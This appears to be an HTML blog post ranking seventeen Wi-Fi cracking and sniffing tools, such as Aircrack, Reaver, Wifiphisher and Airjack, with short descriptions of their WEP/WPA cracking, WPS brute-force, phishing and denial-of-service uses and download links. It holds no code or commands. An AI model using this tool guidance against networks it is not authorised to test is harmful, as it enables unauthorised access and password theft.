<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA3yaKsaG7pXTm1pqZgkrfe0yYOI10iGGbXqELv0O-9htg-654eosui_GKHVNeQgwVrWVHCxXl6bI0UuR2nkZeZ2z4M8rzdJDDDMGPrFOZhoRhCONWFEmOjZBepTMLo1Ba0GPoMHfyhyphenhyphenXW/s1600/Wireshark_icon.svg_-1024x0-c-default.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA3yaKsaG7pXTm1pqZgkrfe0yYOI10iGGbXqELv0O-9htg-654eosui_GKHVNeQgwVrWVHCxXl6bI0UuR2nkZeZ2z4M8rzdJDDDMGPrFOZhoRhCONWFEmOjZBepTMLo1Ba0GPoMHfyhyphenhyphenXW/s320/Wireshark_icon.svg_-1024x0-c-default.png" width="320" /></a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<br /></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
1. Aircrack</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Aircrack is the most popular and widely-known wireless password cracking tool. It is used as 802.11 WEP and WPA-PSK keys cracking tool around the globe. It first captures packets of the network and then try to recover password of the network by analyzing packets. It also implements standard FMS attacks with some optimizations to recover or crack password of the network. optimizations include KoreK attacks and PTW attack to make the attack much faster than other WEP password cracking tools. This tool is powerful and used most widely across the world. This is the reason I am adding it at the top of the list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It offers console interface. If you find this tool hard to use, you can try the available online tutorials. Company behind this tool also offers online tutorial to let you learn by yourself.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download: <a href="http://www.aircrack-ng.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.aircrack-ng.org/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
2. AirSnort</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
AirSnort is another popular wireless LAN password cracking tool. It can crack WEP keys of Wi-Fi802.11b network. This tool basically operates by passively monitoring transmissions and then computing the encryption key when enough packets have been gathered. This tool is freely available for Linux and Windows platform. It is also simple to use. The tool has not been updated for around three years, but it seems that company behind this tool is now interested in further development. This tool is also directly involved in WEP cracking and hence used widely.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download AirSnort:<a href="http://sourceforge.net/projects/airsnort/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"> http://sourceforge.net/projects/airsnort/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
3. Kismet</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Kismet is another Wi-Fi 802.11 a/b/g/n layer 2 wireless network sniffer and intrusion detection system. This tool is basically used in Wi-Fi troubleshooting. It works fine with any Wi-Fi card supporting rfmon mode. It is available for Windows, Linux, OS X and BSD platforms. This tool passively collects packets to identify standard network and also detects the hidden networks. Built on a client server modular architecture, this tool can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. It is an open source tool and supports recent faster wireless standards.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Kismet: <a href="http://www.kismetwireless.net/download.shtml" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.kismetwireless.net/download.shtml</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
4. Cain & Able</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Cain & Able is another popular tool used for cracking wireless network passwords. This tool was developed to intercept the network traffic and then use the brute forcing to discover the passwords. This is why this tool helps a lot while finding the password of wireless network by analyzing the routing protocols. This tool can also be used to crack other kind of passwords. It is one of the most popular password cracking tools.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This tool is not just for WEP cracking but various other features are also there. It is basically used for Windows password cracking. This is the reason this tool is so popular among users.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Cain & Able: <a href="http://www.oxid.it/cain.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.oxid.it/cain.html</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
5. WireShark</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
WireShark is a very popular tool in networking. It is the network protocol analyzer tool which lets you check different things in your office or home network. You can live capture packets and analyze packets to find various things related to network by checking the data at the micro-level. This tool is available for Windows, Linux, OS X, Solaris, FreeBSD and other platforms.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you are thinking to try this tool, I recommend you to first read about networking and protocols. WireShark requires good knowledge of network protocols to analyze the data obtained with the tool. If you do not have good knowledge of that, you may not find this tool interesting. So, try only if you are sure about your protocol knowledge.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Wireshark does is one of the most popular tool in networking and this is why it was included in this list in higher position.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Wireshark: <a href="https://www.wireshark.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://www.wireshark.org/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
6. Fern WiFi Wireless Cracker</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Fern WiFi Wireless Cracker is another nice tool which helps with network security. It lets you see real-time network traffic and identify hosts. Basically this tool was developed to find flaws in computer networks and fixes the detected flaws. It is available for Apple, Windows and Linux platforms.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
it is able to crack and recover WEP/WPA/WPS keys easily. It can also run other network based attacks on wireless or Ethernet based networks. For cracking WPA/WPA2, it uses WPS based on dictionary based attacks. For WEP cracking, it uses Fragmentation, Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This tool is in active development. SO, you can expect timely update with new features. Pro version of the tool is also available which offers much features.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Fern WiFi Wireless cracker: <a href="http://www.fern-pro.com/downloads.php" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.fern-pro.com/downloads.php</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
7. CoWPAtty</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
CoWPAtty is another nice wireless password cracking tool. It is an automated dictionary attack tool for WPA-PSK to crack the passwords. It runs on Linux OS and offers a less interesting command line interface to work with. It runs on a word-list containing thousands of password to use in the attack. If the password is in the password’s word-list, this tool will surely crack the password. But this tool is slow and speed depends on the word list and password’s strength. Another reason for slow process is that the hash uses SHA1 with a seed of SSID. It means the same password will have a different SSIM. So, you cannot simply use the rainbow table against all access points. So, the tool uses the password dictionary and generates the hash for each word contained in the dictionary by using the SSID. This tool is simple to use with available commands.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
With the newer version of the tool CoWPAtty tried to improve the speed by using a pre-computed hash file to avoid the computation at the time of cracking. This pre-computed file contains around 172000 dictionary file for around 1000 most popular SSIDs. But for successful attack, your SSID must be in that list. If your SSID is not in those 1000, you are unlucky. Still, you can try this tool to see how it works.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download CoWPAtty: <a href="http://sourceforge.net/projects/cowpatty/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://sourceforge.net/projects/cowpatty/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
8. Airjack</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Airjack is a Wi-Fi 802.11 packet injection tool. It is used to perform DOS attack and MIM attack. This wireless cracking tool is very useful in injecting forged packets and making a network down by denial of service attack. This tool can also be used for a man in the middle attack in the network. This tool is popular and powerful both.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download AirJack: <a href="http://sourceforge.net/projects/airjack/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://sourceforge.net/projects/airjack/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
9. WepAttack</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
WepAttack is another working open source Linux tool for breaking 802.11 WEP keys. Like few other tools in the list, this tool also performs an active dictionary attack. It tests millions of words from its dictionary to find the working key for the network. Only a working WLAN card is required to work with WepAttack to perform the attack. Limited usability but works awesome on supported WLAN cards.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download WepAttack: <a href="http://wepattack.sourceforge.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://wepattack.sourceforge.net/</a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
10. NetStumbler</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
NetStumbler is another wireless password cracking tool available only for Windows platform. It helps in finding open wireless access points. This tool is freely available. Basically NetStumbler is used for wardriving, verifying network configurations, finding locations with a poor network, detecting unauthorized access points, and more.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This tool is not very effective now. Main reason is that last stable release of the tool was back in April 2004 around 11 years ago. So, it does not work with 64-bit Windows OS. It can also be easily detected with most of the wireless intrusion detection systems available. So, you can use this tool for learning purpose on home network to see how it works.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A trimmed down version dubbed as ‘MiniStumbler’ of the tool is also available. This tool is too old but it still works fine on supported systems. So, I included it in this list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download NetStumbler: <a href="http://www.stumbler.net/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.stumbler.net/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
11. inSSIDer</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
inSSIDer is one of the most popular Wi-Fi scanner for Microsoft Windows and OS X platforms. This tool was released under open source license and also awarded as “Best Open Source Software in Networking”. Later it became premium tool and now costs $19.99. The inSSIDer Wi-Fi scanner can do various tasks, including finding open Wi-Fi access points, tracking signal strength, and saving logs with GPS records. Basically this tool is used by network administrators to find the issues in the wireless networks</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download inSSIDer: <a href="http://www.inssider.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.inssider.com/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
12. Wifiphisher</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Wifiphisher is another nice hacking tool to get password of a wireless network. This tool can execute fast automated phishing attack against a Wi-Fi wireless network to steal passwords. This tool comes pre-installed on Kali Linux. It is free to use and is available for Windows, MAC and Linux.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download and read more about WiFiphisher:<a href="https://github.com/sophron/wifiphisher" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="https://github.com/sophron/wifiphisher" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://github.com/sophron/wifiphisher</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
13. KisMac</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
KisMac is tool very much similar to Kismet, we added in the list above. It offers features similar to Kismet and is used as wireless network discovery hacking tool. As the name suggests, this tool is only available for Mac. It scans for networks passively only on supported wireless cards and then try to crack WEP and WPA keys by using brute force or exploiting any flaw.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download KisMac:<a href="http://kismac-ng.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="http://kismac-ng.org/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://kismac-ng.org/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
14. Reaver</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Reaver is an open-source tool for performing brute force attack against WPS to recover WPA/WPA2 pass keys. This tool is hosted on Google Code and may disappear soon if developer has not migrated it to another platform. It was last updated around 4 years ago. Similar to other tools, this tool can be a good alternate to other tools in the list which use same attack method.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Reaver:<a href="https://code.google.com/p/reaver-wps/downloads/list" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="https://code.google.com/p/reaver-wps/downloads/list" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://code.google.com/p/reaver-wps/downloads/list</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
15. Wifite</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Wifite is also a nice tool which supports cracking WPS encrypted networks via reaver. It works on Linux based operating systems. It offers various nice features related to password cracking.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Wifite: <a href="https://github.com/derv82/wifite" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://github.com/derv82/wifite</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
16. WepDecrypt</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
WepDecrypt is another wireless LAN tool written in C language. This tool can guess the WEP keys by performing dictionary attack, distributed network attack, key generator and some other methods. This tool needs few libraries to work. You can read more details on the download page. Tool is not so popular but it is good for beginners to see how dictionary attack works.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download and read more about WepDecrypt:<a href="http://wepdecrypt.sourceforge.net/wepdecrypt-manual.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="http://wepdecrypt.sourceforge.net/wepdecrypt-manual.html" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://wepdecrypt.sourceforge.net/wepdecrypt-manual.html</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
17. OmniPeek</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
OmniPeek is a packet sniffer and network packets analyzer tool. This tool is only available for Windows platform and is available for commercial use only. It also requires you to have good knowledge of network protocols and understanding of network packets. It works with most of the network interface cards available in market. With available plugins, this tool can become more powerful. Around 40 plugins are already available to extend the functions of this tool.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download OmniPeek:<a href="http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer</span></a></div>
